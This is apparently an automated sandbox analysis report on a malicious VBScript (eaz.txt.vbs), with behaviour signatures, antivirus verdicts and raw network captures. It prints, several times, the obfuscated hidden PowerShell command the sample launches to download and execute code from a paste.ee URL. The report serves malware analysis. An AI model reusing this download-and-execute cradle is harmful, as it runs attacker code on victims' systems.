cmdline	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/80ee0/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/80ee0/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 29, 2024, 4:48 p.m.	show_type: 0 filepath_r: Cmd.exe parameters: /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/80ee0/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) filepath: Cmd.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 29, 2024, 4:48 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (20 events)

Data received	[
Data received	Wf§I_vÃx²:f1ÆÂ^ÑøSÆ*=DOWNGRD ¶ÒâÛíofÝ`òÑ`Ô9ãrµÏîñW9¬LÀ ÿ
Data received	Ò
Data received	Î Ë¡00B ú«>Þ9ÙdïÖ.¬0 HÎ=0;10 UUS10U Google Trust Services10 UWE10 240622144918Z 240920144917Z010Upaste.ee0Y0HÎ=HÎ=BA>Ó-z V/¥\ô]OàêÐé¡÷!f Ärq%þ.Mç7bíþKîç°¸µíÁÂzÑÐ\|O] ?£M0I0Uÿ0U%0 +0Uÿ00UBz~<"ñã6¸ri¸N bW{0U#0w5gÄÿ¨Ì©æ{Ùy{Ìù80^+R0P0'+0http://o.pki.goog/s/we1/rfo0%+0http://i.pki.goog/we1.crt0U0paste.ee .paste.ee0U 0 0g06U/0-0+ ) '%http://c.pki.goog/we1/t4Y_tS4oQ9A.crl0 +ÖyõòðußáVëª¯µq¨À2N®VÙn§õ¥jÑÁ;¾R\@£BÏF0D ;2Áj³,ÛÊø¢<U×+vªÇëÑäÇÝ1r¤%¤ "8} Ô\åIC¼PW:Äo¤Ñ×ìãæwvÿ? ¶ûQÂaÌõº4´¤Í»)ÜhB ægLZ:t@£B3H0F!çSaÔ)),}8b?7îk&æõÑõ÷!þµ¦1 ¨¾ yÞ²ªZx¦$h]ÞvG0 HÎ=I0F!ÄsHv¬NÀ°ú@àO/Ø\ÜÜÞstÝíV!àMv$ å,´X¡P·ÐïÿB±õ0ôjeK£00% ów,"Jv]¶Öã0 HÎ=0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R40 231213090000Z 290220140000Z0;10 UUS10U Google Trust Services10 UWE10Y0HÎ=HÎ=BoÍ:þgWGL!@ÂG]»XG@Á\Æ7çÕ\|íKÙ×¥ øÄÆèÿY,&õæ&%»úV£þ0û0Uÿ0U%0++0Uÿ0ÿ0Uw5gÄÿ¨Ì©æ{Ùy{Ìù80U#0LÖëtÿI6£ÕØüµ>Åjð04+(0&0$+0http://i.pki.goog/r4.crt0+U$0"0 http://c.pki.goog/r/r4.crl0U 0 0g0 HÎ=h0e1ç«QÖ÷CÎuþÑÕÌ@Az&¾Øó2-=®#HR>dy¯õ¦,nU±0&Ìhbç«~èÖD~ãLI¿lb4¸²¡~:P¼§ }sìRAMîâV~0z0b å0¿3C¾ÝI=0 H÷ 0W10 UBE10U GlobalSign nv-sa10URoot CA10UGlobalSign Root CA0 231115034321Z 280128000042Z0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R40v0HÎ=+"bóts§h`®C¸5Å0{KIûÁaÎæÞF½kÕa5®@Ýs÷0Zë<î\|¢@v;©Æ¸GØçjsé±r9)¢Ó_^Xe¡eÑÜÉÇsÈj/åÄ«Ñ£ÿ0ü0Uÿ0U%0++0Uÿ0ÿ0ULÖëtÿI6£ÕØüµ>Åjð0U#0`{fE ÊP/}Í4¨ÿüýK06+0(0&+0http://i.pki.goog/gsr1.crt0-U&0$0" http://c.pki.goog/r/gsr1.crl0U 0 0g0 H÷ B»Öã?c ¤¡hH9"søËN-1éç ¡Ò6¬yëé°ëj¶{}t¸e«h,,ÝBýÆqÏ-÷kÈn}Vâ#XXù%ºG× ý ¶à.®UÑyu5,1[?e¼ÍB§±^ñ»Ê-Gð¬c~¿ÖäkÓÖÓgX¸ÿ÷¦ IP[?:%ò\ÓyW6Îÿ&·©ñí>ÈnëÓ<8ÀAá^SÏ> Wëîâ?H¥ñ¾Ñj#û?/¢µ½ên£FÎ.g¯3&ªÕKÒ©6Å&;[Áå
Data received
Data received	A³/ûo)ñ,"ô×é-s·ìß¾,³²È)Ö«´göéL5IÛî?¬S T%ÜôËØ3·F 1¹lF0D BrJw?ý¾IËÐOÅòïÊ áµ¾åHÔY eÂ 1t°d_mÑÐóóF##(vìÇèbÉ½
Data received
Data received
Data received
Data received
Data received	0
Data received	ôpQAôeÅBñúxÏ¼ÄÙÒ¢Ús ÑêG8_ü©1Ádv híýCj
Data received	p
Data received	«+éN¾ªï)cs°èîÁáºÅ,ùË×³ý ØÜ4G§ïëP³mm©÷ø:ìbÇêÜ'´\|·åßAmÏä1eßN·â¿å¢J¢½ïÿtÛô×¡CjKæèp(£+çfîòóæÛ0=øÍ[ ëÀtw}BªÑÛ¤ÚÉÎoF>èNÍ§n,T´¿Ê'0ÃÏº5R{ÐÉòDø, +B»N¾Uç+ücùç:Éì_\|ÝMÌ4å_EÑFøßENÉÔI ¸XöÃÃå6>¯¢ºøÐò¾3Ì¸Onïêöª¯IFPÚKZüëõ^5ô³./aÈµ~´lw]ä+¯üvdr··âà·±ëúßQòµ¢<æ\F½OíTg#êÄ%Z÷_5Ðèî ]Ø[ «¼ÒØiG ¡äÞÉ (ÂzÇé®\|: 7;¥ã`íqTNê®3/Ç©b¼ä<æÇ"z¤D>Û?"ëâ:OÍI@Â¶"¥µÕG¶±ã8]È5³ûÕyñ2çbyªÙq®ÂÜI{7<¹¶/} 4øêTÏ÷øT¦T»+Ô×ÉN0HÛ¢#'^9Î¤Ë)Âæ$ÞºÑ³æqy¡£FxÆeJæ ]oõKµjÚï8+ =±J-Ü\|Ï_Å3+NúEA'yòäUT°jsyw#Û6ç3C´Þ¬;Û0`Á.÷×DSÕÓÖ@DGDëzkç¥ ³oä#-h¼ïåè×P®µP¹Oû+¦1óãbfqDiE¹¦¤]6M£5Ýõ/¡Åpø¡T" }¡¿AIIµzmøÐÌWó^Y%t©ÑD¡kDuÒeËÌ>A§¬M;0Í/,Ñ÷ÞÄôqÅ.Ù¦M¸ÚLØu,@4$ï\³Ñó0aîhï©f¹k:MWõ_)®ZV]D:¯Ö© 3¯é+.cBÐ°ld>s2»^Úrq£Yú(xNåhÉÓo¶¦yª[lÍtfoÝ½MêXÚÎ¯×ªiËó¾=Øw¬ý¾ô{þs?:öÙ#Ó¢Æªû 2bèX«8rßBR®Å!6N?'!?h LÕÆô<!9A%2ÑäP F>EKiaìô£,]£UÞ§#ó®Í.:cñ õ^!L«18émÞfDÝré=Ø}äòè¿óÿM£ñPFæ¿b=YY¡8?¨à3¯DÙV¿ü}ô½W¢$éçá§õ¨_h1 Ú2¥Ð/w[XÓéüOVýÜãN¿«êNW åÄAèêïnýëÆ¿K×É¡Z3°83ð>û §û°ìÁ5©ØÔ§n8O årUlÊÝ+ädòÝ5÷ÿ¬ÌÐÈ\|ðx¯±[òÒoÛÐ×[e z¿°»Æ¢0B ?'I(P=ôPkLÎm¸ë¡<{ðçefYRæ^ÈIeGüeQÞìlÔ`)¥¡sMtu1ðñhVÚ0%4U!"yêÀã`çr>ÆÉ+JÑ±5ßF¿¡ "±õõµ"ôiûö9(?Qÿ>rñûY³nz-j´{ §úÑ>Æ^XÃÈÿø/o¼ì»Àë?«_¼à2ÔÒÕàS¬RÏºÛÏºµÅ9\|ÄÎ¡©ý¶¶\|²
Data received	üI+^ê«J¼¡YÞ¬xls01·Æ×IB¦E(ê{ e]Ìç7{ÏFü½k-SÚÙ?Óh2&[ìÍm÷ã ëØÊñËMGp ÿSºlm@Åxß©¯µVo³ñPr3;ßLèöé`9d\Cö;Ó"LÝxò~Msb{+¼îÅ:r¿bP¤¥=À¡¨\|[]ag:ÝCÓ¼ÛÂsÞU®lÁUÑdULÒ°báñ;µËq"Ñ¾üWmÔ«fVh={Û×±«ê¹ ï©²¦§÷ÜVüùe/ØÂQcý¢LÀ{·HN³Éc[Ëå×¡ªO'÷Yyøº À:t¼[f`ãÀ?hýAz\ê«uþåà`x·×ã¢¥¶]ÖÄ»ó²uþM»zðb÷`oëZOàÔó}Y§FW)"VQ4,¸#¯Lç÷ÉÁéÛþÅè5ßý²\lfAÙ%zïo&é{¡=SV;.uMºÅ^ýeÊYñ£ì¸zÍ1&«1³fïs ~8c8Hñ"àr½µÀyxâ8C÷¤¾V§¸üärkÃ úÏô.Yäc &:â·5:DBF=2;ÚÇkRô5¦ÔÕH.¹JSVþ}ÉO3æjw½äêSCpç1ÝkÎk5Óþ§ Ì¸Â0õ_#Å×Ô(> ÕFû"ÿÚ®³²+ðÓ¤\ï©;Áw '±â²3©lTmôÏ~S,}J·Hÿ'xÞGÀ$ùW ;è{~5Ißµj¿ Cç!ïVCÐ¸íüWÉVbúæ h»mtI4n1KüñomÞ<ä<Oµ+µ:ïo·Âp¼ö?°¬Y¬¸å)ïÊìS×y°<#Â«as(¿sðÀnÌÕ"7eeÀ°+³Ï·Îé¥öÓM¿x$µaâÄNön$7iá¾2öV°ñ ¦"Ògº½ðìsÀ¬n)q(ÌMÇ\|fkÓbd=9fÁöy °²FÁK§Òcî^¾#§0KdÌ»Ó´rØ¯GfiÐõt¶»GÈÈÇ©Ôºò#Î¯AURô½/¸F¥Û3¿Ç=<C#>Ë£\|jâ¥KÑÂeéÉ¤÷<,Ã;wUZÞ®ºr8¡ýºÍB&ÌcuÍæVN«5ú²ç nÞI6£H<)kaD>Ñþ)6]vñLì¹gV`h÷IOu Õ×ÇÆ£¦æõ}È¡¨&°H¬Ow+ÄÃeØåE\Kî9õü§IÇÝFËIxrÞétñ¼Ñ]V"¨X§gÇ ûÉêgÞ$ÄÊT'A.«)eÓA×æÛA-72ÈtÝ>ùå¿a`êfïó2V©î´ç\|óÜ¥ L<è.²3IÏ¦#ÍÕï06ÿÜßÕÍt<»ÇY8?ñKß´CÉr3âÃ/óqF®«uEyÊ"\|¼(JÕ©>>Ð.^VSaM,FØñ3àôúðiìE¥c×à%§ FWBR^MK¤º&3^"GÝ&Ó&L ¬º¡ªDQ¦i»ðêhÌÆ%ÇAcArLI¡D\XO7/í¬!=Lò`/ÙØ
Data received	äWsC¬JZÓ¯ ´»Õw å@;I<Ø_·m6IÒÂwÿQé/J}Ï Ûl(³+8lSù&º¡§åèÐnsN½fNá´íýÔÃÏzLÐkbfRFzÞh²ZK¡)NßÜ£\|Ó°Ýj·@"Ú>6¬SèÃu_ú¬]C``" ¶ZÁñ2 µ=Ì«!¬N'ÃÕÀ²¥dÎ¨æíjÆKøâ¬'\W¦,Qç\|è/¢Ôá»yayrØTÈwj¿±~°Ycäö\|XS¸K2UVEËÆFæ9GÝÿuÆ©ØRÁÎ¶sWæ ö0%5%dn¸ð.DÌõ.¢0k ¾úµPnÓtìâè2g=çéZªä@\PøÍ²>³2J(èü?m¦g¿ ø%bÔå=®D¢«2ª,üÃ§ k!¯Vª#zpÜnb¸ðà¦ÄûÄ`Ï¹Jv#HÌC%ÚuS°¿~²&ôbÂ3ê¾Rët;ga¢¼±î:>óeS9;k¡[.èS¹-õÝ¦®ÿEÊÑÒ×Ò{;:aCdA¸-<_ã¡ÝQ@xþï=,cjbÎÚ&ãf&¼µÖxï\|( ìÂt¶ 7{Ä7ÛíO(z£gÆ¥Íôà\|ló,3È¬¼ÅØ02ZåuÌå¹Á}BÂKÄú,âÓm÷Ì.è3ûÝ/þó Ùÿb¥ñÛû'Bt2¶>Í+Ài Ñ(ó^Ó63Oq0j/ SÓ¸·<fêA µ?µ®ÖNU=tm>ÌkÁMW$rÌ%A% 2¹<Úª/J¼uy\ÀW¦b¯@ÎõMãûÕ Üv±¯¡`Ê¸GùÉïÐ+Ð óÒÔ1èE×!èv=ê_P]n¥tÇÛî?¡Ûüþõ°¼Çw/Ê'«ýÃÝ HÁ-;Ñ1uçT+#J3æiU2Ý¦åè$]Ëµâf¥,^º c¥J äWàu¹µB)zöôäË:ñmZ±Ao °3ïÎo,®ñôû4÷ÇèªðaBFPº-ÂwfvvwìYþÔ;pKÂ$^cåJ#V§õfQë¸Ã\´Õ\1/,e9æü#í£¿ñ-ìÌ¬37 ÔFyt8ÅýGiýp8oÜÎdßc?¹Cgô>:°(XL÷´;ù_vÍq7¡EHZr¡ø°<ooÐôûoP¯`-=59Nµa°[¨0Û l+®ÿ¹½]ò@±ãl»¦>§A4þdBqQËFYÛ%®mx~¢ fïq£`¿>¦;Ò=óuik&É9z-§´E(Çkáµ°!Ç8±ÿ×õª'VÚb©[;ì_8ÆÀ ;îloã?§ëüd½^t¥6Æ*çAþbãiÝêó£»ÙRÑ¦ô6)¬\:;;<¨Y#gSÑàØ4ÕjhZàWõàëÉZX®Ï<Ç.²s lÝ78ºIwbú+y¹)öñù~;²sÇãLæUÚøRõ&¼<ê7"ðåÈñ_3g&¬ÒÝ2;úBaÐÜ°¨°rlÞ Ïg(Ä´ûóÿüìNU¢jnpt_
Data received
Data received	<ãÞê2"w[BR[±ê.¶ÇØ+pN¢0hPÈó¢M®;ÇµKúùë>¦¤W8Ì½õouY!ð0+\¬NÌãÎú7"/8òüþê¡òb:Ô¤XÐhbaT\|¯ÎAXó¦P> ×¬Úõb'¤Án[®Éþúá¯v´Íþ7þrÍÝh0p2¦ ¸½¹ÆáZ$ÊI¼SÏh/¡q(t¹S[Åfº:ÌÔ³)ÑZÃöÄqÂh@\²sv q¹Ìß&[3@XäÞJ\Ch×q f´gá¡è0ñi¶´Rµ@í6Öß/÷æ^×¨ ¬ëÝW¦%¯cØüÃ°=y"+Ôöá-%¤.Å 6aGùÚÿÊRþëì)Úkm~iRßÑùv1ÛÞ=?Ám;ËüqºgÌnà½#gò».¿vM+W¿~¼®ðÖ)²NO½õú Sp5XgÊëËéÿr#¶s¦ Ï/vã¦´±IcÜ$Kùª÷_ò)G8ÂjïCgmÜ×eY[@Z¨]Iº¯ÇèÓM$ìµ«Âq¸¢¡Ôa¡ô6³Ó¥-Pluy+$W½BþiÕÛù1[¯ïvòoÜ4»orzéØËA@\å9 ÛWÎÝ¿q!Fi2¯hh/\QñÛ}BÓfÿ'?tW/Æµz pÙJ¶Lmßa«Ê!w&8¢Ê>)øû¸»éÕ°$#ÔÇL\1C²,%lÝêï¤t@á!mD ù`t1coV ÊæÏÎvMÚó¥¦7F9¹Mê¦sám ¨l¥÷#óè&<alÀIb6\M)ò!ÐíYöi IfJ@Å³)ÌDÝÔbÉlÅrùbáJ'òãlã8ÆdÚ÷O96¤ °¢Èennâü¬ »¸ORÆ°{°íÜá_ÀçÆã¢mÑ~ZÓÈPä>ÀwZ×éa½.2Ê 8Û£'ÍLn#§ ¬JÏRbRy·S+n·rqòý¬äºÀdé¤8XÂÀ ò'AR5 æê²
Data received
Data received	wÔ3°Ìd±ÞTQV]õ5Êß#"«ç,Ô?P¨ÒÒ

Poweshell is sending data to a remote host (3 events)

Data sent	kgf§IVºâÜ\ÖåÂ[ÿtÚàUB§lRc%Rï<Í/5 ÀÀÀ À 28&ÿ paste.ee
Data sent	FBAVàÎÃÇñÊ¿íóuÙLÎª)ºê>Jf¡ìÖÓÙd0àeÞÝ<ÆTß¢¥K\|ÕÍëíq-¿0ñmZú´B 2¤ «Û³"ÛÃ\|E±,ez\ÆàF7'k¶\|ÖÐsÀ
Data sent	`©nS>nCî»5KKDÆµÈÚÃÚ£ÌÖÖ\©¸W¾úzØÞt¸K:A¼Qcæ»ÜX¾ª ! Â?3{½?í^fâBÀ:9){ ù éôºr9 %'5

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 29, 2024, 4:48 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

File has been identified by 12 AntiVirus engines on VirusTotal as malicious (12 events)

Symantec	ISB.Downloader!gen80
ESET-NOD32	PowerShell/Runner.A suspicious
Avast	Script:SNH-gen [PUP]
Kaspersky	HEUR:Trojan.VBS.Alien.gen
Rising	PUF.Runner/PS!8.188C4 (TOPIS:E0:V57SxEang5G)
Ikarus	Trojan.PowerShell.Agent
Google	Detected
Microsoft	Trojan:VBS/Obfuse.RTDF!MTB
ZoneAlarm	HEUR:Trojan.VBS.Alien.gen
Varist	VBS/Agent.BOL!Eldorado
huorong	TrojanDownloader/PS.NetLoader.fk
AVG	Script:SNH-gen [PUP]

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send July 29, 2024, 4:48 p.m.	buffer: kgf§IVºâÜ\ÖåÂ[ÿtÚàUB§lRc%Rï<Í/5 ÀÀÀ À 28&ÿ paste.ee socket: 1416 sent: 112	1	112
send July 29, 2024, 4:48 p.m.	buffer: FBAVàÎÃÇñÊ¿íóuÙLÎª)ºê>Jf¡ìÖÓÙd0àeÞÝ<ÆTß¢¥K\|ÕÍëíq-¿0ñmZú´B 2¤ «Û³"ÛÃ\|E±,ez\ÆàF7'k¶\|ÖÐsÀ socket: 1416 sent: 134	1	134
send July 29, 2024, 4:48 p.m.	buffer: `©nS>nCî»5KKDÆµÈÚÃÚ£ÌÖÖ\©¸W¾úzØÞt¸K:A¼Qcæ»ÜX¾ª ! Â?3{½?í^fâBÀ:9){ ù éôºr9 %'5 socket: 1416 sent: 101	1	101

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/80ee0/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process	wscript.exe				martian_process	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/80ee0/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

Creates a suspicious Powershell process (12 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

eaz.txt.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All